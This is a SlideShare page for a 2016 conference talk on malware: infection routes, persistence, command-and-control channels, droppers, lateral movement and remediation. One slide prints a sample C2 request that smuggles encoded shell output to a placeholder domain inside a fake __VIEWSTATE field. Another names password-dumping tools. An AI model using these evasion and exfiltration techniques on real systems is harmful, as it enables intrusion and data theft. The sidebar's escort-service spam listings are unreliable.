SlideShare a Scribd company logo

ECrime presentation - A few bits about malware

Download as PPTX, PDF
Michael Hendrickx
Michael Hendrickx

This is the presentation I gave during the e-Crime conference, February 2016.

Internet
1 of 20
A few bits about Malware A story about trojan horses and rats.
$ whoami • Michael Hendrickx • Senior Security Analyst @ HelpAG • Vulnerability Assessments • Social Engineering • Presentations  • Created new undetected* RAT for the company • Belgian * Until now 
Malware attacks: a real threat • Malware have caused a lot of damage • Many names: RAT’s, virus, Trojan, rootkit, ransomware, … • Examples: Cryptolocker, Zeus, BlackEnergy, … • Targets different platforms: • Browsers • Smartphones • PC’s
Malware attacks: stages • Malware attacks comes in 2 stages Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement “you’re in trouble”
Malware attacks: infection • Stage 1: modes of Infection Exploited Software Bugs (Spear) phishing Waterhole attack Malicious USB
Malware attacks: infection • Exploited software bugs • Attacker hacks into vulnerable service • Could be anything: • SQL injection on website leads to code execution • Poorly implemented upload functionality • Unpatched server software • Man in the Middle • Weak passwords • …
Malware attacks: infection • Spear phishing • Very specific message to single or very few victims • Holds malicious payload • Macro, PDF, renamed files, trojaned archives, … • Or, links to malicious file: • Needs to be downloaded, won’t get caught by your AV.
Malware attacks: infection • Waterhole attack • Indirect targeted attack • Attacker compromises sites that the victim probably visits. • Exploits outdated browser or plugins • Forces install of malware “your flash player is outdated” “you should update Java”
Malware attacks: infection • Evil USB dongle • USB peripheral can be anything • USB hard drive / dongle • Keyboard, WIFI / network adapter, Microphone, … • Hub with any of the above • Example: USB rubber ducky • Looks like dongle, is a keyboard • Types 1000 words per minute • Is only 30 USD
Malware attacks: stages • On to stage 2: Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement
Malware attacks: persistence • Stage 2: Persistence • Execution persistence • Ensure that our malware keeps on running • CnC Connectivity • Listen for commands • AV Evasion / Hiding • To prevent malware from being detected, removed • Lateral movement • Infect more machines
Malware attacks: Execution persistence • Ensure malware keeps on running • Startup folder • Registry keys • Automatic Services • Browser plugins / helper objects • You’re re-infected whenever the browser is opened • Infected document templates • Every time a word/ppt/excel file is opened or created, you’re re-infected. Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
Malware attacks: CnC connectivity • Direct traffic • Probably (hopefully) detected and blocked • HTTP Tunnel • May get detected by L7 firewalls • “deep packet inspection”, pretty shallow • HTTPS • Difficult to see what’s happening, unless MITM. • DNS Tunneling • Usually gets “proxied” to target DNS server • Do you monitor anomalies? • Peer to peer WIFI network Hi, I’m an ad-hoc wifi network Up to 10 – 20 meters
Malware attacks: hagrat CnC • Encode / Encrypt / Obfuscate traffic POST /css/cc.aspx HTTP/1.1 Accept: text/html;q=0.8,application/xml,*/* Accept-Language: en-gb;q=0.8,en Content-Type: application/x-www-form-urlencoded Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: www.thisisafakedomain.com Content-Length: 277 Connection: Keep-Alive __VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;. 1:Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:UsershendrickxownCloud>dir c:/ Invalid switch - "". C:UsershendrickxownCloud>
Malware attacks: hiding • Hiding • Download multiple stages Dropper Malicious Payload (Real Virus)
Malware attacks: hiding • Multi stage download ensures correct victim Malicious Payload (Real Virus)Can I reach the Internet? Dropper Innocent Payload This is not the IP / Company / country I’m targeting Cool, I’ll install it Bingo!
Malware attacks: lateral movement • Exfiltration of information • Documents (%userprofile%documents) • Passwords (mimikatz, Lazagne) • Browser history • Emails, files, … • Recon / Infect the network • Ping other machines • File shares • (Sharepoint) portals
Remediation • Human factor: don’t get infected • Social Engineering exercises • Awareness • Alerting IT security (“Support, I think I did something wrong”) • Technical factor: prevent, detect, destroy • Tight controls on end points • Monitor inbound programs (attachments, downloads, …) • Monitor network usage • DNS Anomalies, unidentified protocols, … • Regular scanning with AV, IOC detectors, … • Such as Loki: (https://github.com/Neo23x0/Loki)
Thank you! Questions? Don’t accept any USB dongles from me! 
CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM DUBAI, UAE ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741 T +971 4 440 5666 F +971 4 363 6742 ABU DHABI, UAE SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195 T +971 2 644 3398 F +971 2 639 1155 DOHA, QATAR AL DAFNA – PALM TOWER OFFICE 4803, WEST BAY, P.O. BOX 31316 T +974 4432 8067 F +974 4432 8069

Recommended

Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineeringMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008Caleb Sima
 

Recommended

Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineeringMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008Caleb Sima
 
SSH - From Zero to Hero
SSH - From Zero to HeroSSH - From Zero to Hero
SSH - From Zero to HeroOWASP Khartoum
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Browser Security
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019James Bromberger
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Simple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteSimple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteRich Plakas
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Owasp2013 johannesullrich
Owasp2013 johannesullrichOwasp2013 johannesullrich
Owasp2013 johannesullrichdrewz lin
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilitiesn|u - The Open Security Community
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)vinayh.vaghamshi _
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super BaitJeremiah Grossman
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2drewz lin
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Michael Hendrickx
 
The Cross Window redirect
The Cross Window redirectThe Cross Window redirect
The Cross Window redirectMichael Hendrickx
 

More Related Content

What's hot

SSH - From Zero to Hero
SSH - From Zero to HeroSSH - From Zero to Hero
SSH - From Zero to HeroOWASP Khartoum
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019James Bromberger
 
Simple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteSimple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteRich Plakas
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Owasp2013 johannesullrich
Owasp2013 johannesullrichOwasp2013 johannesullrich
Owasp2013 johannesullrichdrewz lin
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2drewz lin
 

What's hot (20)

SSH - From Zero to Hero
SSH - From Zero to HeroSSH - From Zero to Hero
SSH - From Zero to Hero
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Simple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteSimple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress Website
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
Owasp2013 johannesullrich
Owasp2013 johannesullrichOwasp2013 johannesullrich
Owasp2013 johannesullrich
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
 

Viewers also liked

Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Michael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
امن الشبكات المخاطر والحلول
امن الشبكات المخاطر والحلولامن الشبكات المخاطر والحلول
امن الشبكات المخاطر والحلولabayazed
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 

Viewers also liked (11)

Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2
 
The Cross Window redirect
The Cross Window redirectThe Cross Window redirect
The Cross Window redirect
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
 
امن الشبكات المخاطر والحلول
امن الشبكات المخاطر والحلولامن الشبكات المخاطر والحلول
امن الشبكات المخاطر والحلول
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
 
Securing the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsSecuring the Internet from Cyber Criminals
Securing the Internet from Cyber Criminals
 
OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 

Similar to ECrime presentation - A few bits about malware

Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
password cracking and Key logger
password cracking and Key loggerpassword cracking and Key logger
password cracking and Key loggerPatel Mit
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomwareSophos Benelux
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manualRoel Palmaers
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptImXaib
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareQuick Heal Technologies Ltd.
 

Similar to ECrime presentation - A few bits about malware (20)

Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
password cracking and Key logger
password cracking and Key loggerpassword cracking and Key logger
password cracking and Key logger
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manual
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Ransomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant MaliRansomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant Mali
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
 

Recently uploaded

Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaimessage0108
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 

Recently uploaded (20)

Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of india
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
